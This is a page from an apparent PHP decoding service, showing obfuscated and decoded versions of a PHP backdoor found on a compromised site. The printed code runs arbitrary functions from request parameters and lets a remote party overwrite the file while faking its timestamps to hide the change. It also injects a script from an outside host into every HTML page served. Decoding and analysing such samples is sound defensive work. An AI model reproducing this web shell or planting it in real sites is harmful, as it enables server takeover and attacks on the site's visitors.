Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
IF(($AItS1x8=@${"_REQUEST"}["PVGCMQGM"]) && (4032+30914)){ $AItS1x8[1 ](${ $AItS1x8[2] ..
Decoded Output download
<? IF(($AItS1x8=@${"_REQUEST"}["PVGCMQGM"]) && (4032+30914)){
$AItS1x8[1 ](${ $AItS1x8[2] } [ 0],$AItS1x8[3 ]( $AItS1x8 [4]));
};
/*cut here;)*/
if(isset($_REQUEST["464g13xnhn66io4u"])){
if(empty($_REQUEST["464g13xnhn66io4u"]))
{
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
}
else
{
header("X-LiteSpeed-Purge: *");
if(function_exists("opcache_reset")){
@opcache_reset();
}
if(function_exists("apc_clear_cache")){
@apc_clear_cache();
}
$j9p1lw=filemtime(__FILE__);
$xazo5z=fileatime(__FILE__);
echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["464g13xnhn66io4u"]))));
@touch(__FILE__,$j9p1lw+1,$xazo5z+1);
}
die;
}
if(
isset($_SERVER["HTTP_ACCEPT"]) &&
(strpos($_SERVER["HTTP_ACCEPT"],"text/html") !==false ||
$_SERVER["HTTP_ACCEPT"]==="*/*")
)
{
function qz0ibz($j9p1lw){
return str_replace("</head>","<script type='text/javascript' async src='https://s4w50um0.cloudfire.quest/challenge.js'></script></head>",$j9p1lw);
}
ob_start("qz0ibz");
}
/*cut here;)*/
?>
Did this file decode correctly?
Original Code
IF(($AItS1x8=@${"_REQUEST"}["PVGCMQGM"]) && (4032+30914)){
$AItS1x8[1 ](${ $AItS1x8[2] } [ 0],$AItS1x8[3 ]( $AItS1x8 [4]));
};
/*cut here;)*/
if(isset($_REQUEST["\64\66\64g1\x33\170\156h\15666io\64\x75"])){
if(empty($_REQUEST["\64\x36\64g\61\x33\170\156hn\x366i\157\x34\x75"]))
{
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
}
else
{
header("X\55\114\151\x74e\123\x70e\145\144-\x50\165\x72g\145:\40\52");
if(function_exists("\157\x70\x63\141\x63h\x65_re\163\x65\164")){
@opcache_reset();
}
if(function_exists("apc_c\x6ce\x61r_\x63a\143\x68\x65")){
@apc_clear_cache();
}
$j9p1lw=filemtime(__FILE__);
$xazo5z=fileatime(__FILE__);
echo strval(file_put_contents(__FILE__,gzinflate(pack("\x48*",$_REQUEST["\64\x36\x34\x67\61\63x\x6ehn\66\x36\151o4\165"]))));
@touch(__FILE__,$j9p1lw+1,$xazo5z+1);
}
die;
}
if(
isset($_SERVER["H\124\x54\x50_\101\103\103\105P\124"]) &&
(strpos($_SERVER["\x48\124\124\120_\x41C\103E\x50\124"],"\164e\x78\x74\x2f\150t\x6d\154") !==false ||
$_SERVER["HT\124\x50\x5fA\103\103EP\124"]==="*/\52")
)
{
function qz0ibz($j9p1lw){
return str_replace("\x3c\57h\x65a\x64\x3e","\x3c\x73c\162i\160t\40\x74\171\x70\x65=\x27\x74\145\170t\x2f\x6a\x61\166a\163cr\x69\x70\164\47\40\141\x73\x79\x6ec\x20\x73\x72\143=\x27\x68\164\164\160s:\57\x2fs\x34\x77\65\x30um0\x2e\x63l\157ud\146\151r\145\x2e\161\x75e\x73t\x2f\x63\x68al\154\x65\156\x67\x65.\152\163'\76\x3c/\163cr\x69pt\x3e\x3c\57h\145\x61\x64>",$j9p1lw);
}
ob_start("\161z0\151\x62z");
}
/*cut here;)*/
Function Calls
strpos | 1 |
Stats
MD5 | 2050f196dbf584bef9dcc3a96be02d0e |
Eval Count | 0 |
Decode Time | 398 ms |